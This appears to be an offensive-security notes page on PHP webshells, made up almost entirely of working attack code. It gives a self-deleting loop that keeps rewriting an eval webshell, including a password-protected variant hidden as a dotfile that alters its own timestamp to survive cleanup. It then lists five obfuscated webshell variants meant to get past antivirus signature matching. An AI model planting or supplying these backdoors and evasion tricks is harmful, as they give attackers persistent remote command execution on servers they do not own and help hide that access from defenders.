Links

Webshell

PHP Backdoor

Here is a PHP backdoor that is extremely hard to delete:
<?php
// Let the script keeps executing even if client disconnects
ignore_user_abort(true);
// Disable script execution time limitation
set_time_limit(0);
// Delete this file iteself
unlink(__FILE__);
​
$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';
​
// Keep writing PHP one-liner backdoor into the file
while (1) {
file_put_contents($file, $code);
usleep(5000);
}
?>
It deletes itself by calling unlink(__FILE__) and then keep writing the webshell code into shell.php. An improved version of this backdoor is adding a password in case someone else uses it:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
​
// Let the webshell be a hidden file
$file = '/var/www/dvwa/.config.php';
// password="super_secret_password"
$code = '<?php if(md5($_POST["pass"])=="a444f0a46019465ed8eb7f42548e6a0f"){@system($_POST[a]);}?>';
while (1) {
file_put_contents($file, $code);
// Modify the timestamp to bypass deletion bash script
system('touch -m -d "2022-04-25 12:14:32" .config.php');
usleep(5000);
}
?>

Antivirus Bypass

Suppose antivirus software matches <?assert($_REQUEST[;?> and <?eval($_REQUEST[;?>. If these two patterns are found, then the webshell is detected and deleted. Our objective is to achieve the same functionality without using these two patterns directly.

Idea 1: Define a constant

<?php define("a","$_REQUEST[cmd]");eval(a);?>

Idea 2: Define a function

<?php
function a($a)
{
return $a;
}
eval(a($_REQUEST)['cmd']);
?>

Idea 3: Define a class

<?php
class User
{
public $name='';
function __destruct()
{
eval("$this->name");
}
$user=new User;
$user->name=''.$_REQUEST['cmd'];
}

Idea 4: Parameter

<?php
$COOKIE=$_COOKIE;
foreach($COOKIE as $key=>$value)
{
if($key=='assert')
{
$key($_REQUEST['cmd']);
}
}

Idea 5: get_defined_functions()

<?php
$a=get_defined_functions();
$a['internal'][841]($_REQUEST['cmd']);

Hidding

​

​
​
​